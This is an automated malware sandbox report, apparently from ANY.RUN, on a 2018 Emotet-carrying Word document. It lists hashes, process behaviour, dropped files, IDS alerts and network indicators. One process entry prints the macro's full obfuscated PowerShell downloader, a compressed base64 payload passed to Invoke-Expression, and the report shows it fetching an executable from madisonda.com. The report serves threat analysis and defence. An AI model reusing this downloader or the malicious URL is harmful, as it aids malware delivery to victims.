analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

8961ce481d754141af7af5f15e09e829a0ae53821aa466e41f1fd788f83cd92b.doc

Full analysis: https://app.any.run/tasks/e60be5d4-789a-4300-94ed-d5f93a8bf3c5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 14:10:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Andrew-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 11:05:00 2018, Last Saved Time/Date: Thu Nov 8 11:05:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

6004792C84B68686AA2854F3E48A13FE

SHA1:

7A10FA8B1E4A858554D7C86E62AB94A3B0A7092B

SHA256:

8961CE481D754141AF7AF5F15E09E829A0AE53821AA466E41F1FD788F83CD92B

SSDEEP:

768:Lb0VVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9HldpYHbsTemkd:L4Vocn1kp59gxBK85fBt+a9lcz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3904)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3904)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2740)
    • Application was dropped or rewritten from another process

      • 940.exe (PID: 360)
      • 940.exe (PID: 3224)
      • lpiograd.exe (PID: 3412)
      • lpiograd.exe (PID: 1672)
    • Emotet process was detected

      • lpiograd.exe (PID: 1672)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 3492)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2740)
      • 940.exe (PID: 360)
    • Creates files in the user directory

      • powershell.exe (PID: 2740)
    • Starts itself from another location

      • 940.exe (PID: 360)
    • Application launched itself

      • lpiograd.exe (PID: 1672)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3904)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 11:05:00
CreateDate: 2018:11:08 11:05:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Andrew-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 940.exe no specs 940.exe #EMOTET lpiograd.exe no specs lpiograd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3904"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\8961ce481d754141af7af5f15e09e829a0ae53821aa466e41f1fd788f83cd92b.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3492CMD cMD.EXE/c"sET yXu= (New-obJeCT Io.COMprESsiON.defLaTEstREaM( [sYstem.IO.MEMORYstreaM] [CONvert]::FROMBaSe64STrIng( 'NZBRT8IwFIX/yh6aFIJ0BjEGmiUoiMFERJboiy+37WVUunZu3SoS/ruwyOv5zv2Se8jLw3diMfSd+ELpoyV69oFiajRaz8l6FhK69b4Yx3EOSlfOKmDS5fHKyvC8TNPJPwVvoOobEKysY+3c6maks+ZCc52VINvDqXifP1evg9u7C6wKhF0otUeGqmYFxgZsVkOG8ZOwj2WRiks1hMBEbZVBpRBMK1QNLvfr9XBAWVoY7Tt0Qruc/N5voiSio+E15WRjdULQNmOPedGjn7R35j3K8Acp37gSQW47JH3LI22j89vdgy/3B3Kah81csMaBmmuDbecqOgu7fGEbt8P+4iRtEy5Onh0/SvByezge/wA=' ), [Io.COmpresSIoN.cOmpREssIOnmodE]::DEcomPRESS ) ^|% { New-obJeCT SYSTem.io.stReamReaDER( $_ ,[SYSteM.TExT.encOdING]::ascII)} ).reaDtoend() ^|invOkE-EXPrESsiOn&& poweRSheLL Sv ( 'h' + 'e87r' ) ( [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I' ) ) ; .( \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO' ) ( ( ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV','ArIaBle','GeTeN','vIr' ).Invoke( 'YxU',(\"{2}{0}{1}\" -f 'Es','s','pRoc' ))) )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2740poweRSheLL Sv ( 'h' + 'e87r' ) ( [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I' ) ) ; .( \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO' ) ( ( ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV','ArIaBle','GeTeN','vIr' ).Invoke( 'YxU',(\"{2}{0}{1}\" -f 'Es','s','pRoc' ))) )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3224"C:\Users\admin\AppData\Local\Temp\940.exe" C:\Users\admin\AppData\Local\Temp\940.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
360"C:\Users\admin\AppData\Local\Temp\940.exe"C:\Users\admin\AppData\Local\Temp\940.exe
940.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
1672"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
940.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
3412"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exelpiograd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Total events
1 648
Read events
1 249
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9DE1.tmp.cvr
MD5:
SHA256:
2740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GRCLDN3YL25Z4483HPG1.temp
MD5:
SHA256:
2740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da98a.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$61ce481d754141af7af5f15e09e829a0ae53821aa466e41f1fd788f83cd92b.docpgc
MD5:04C4EF27A9E5DA588439EDDE165B5D4C
SHA256:608F73BDE74FE76051AD27A6548C7511311AE0DFD7C4EC159E11A55E8CDE9A9A
2740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2740powershell.exeC:\Users\admin\AppData\Local\Temp\940.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
3904WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F12123BE3FC217E2B306FA7D3C1EF718
SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32
360940.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2740
powershell.exe
GET
301
173.201.98.1:80
http://madisonda.com/PncwJNSS
US
html
301 b
malicious
2740
powershell.exe
GET
200
173.201.98.1:80
http://madisonda.com/PncwJNSS/
US
executable
792 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2740
powershell.exe
173.201.98.1:80
madisonda.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
madisonda.com
  • 173.201.98.1
malicious

Threats

PID
Process
Class
Message
2740
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2740
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2740
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2740
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info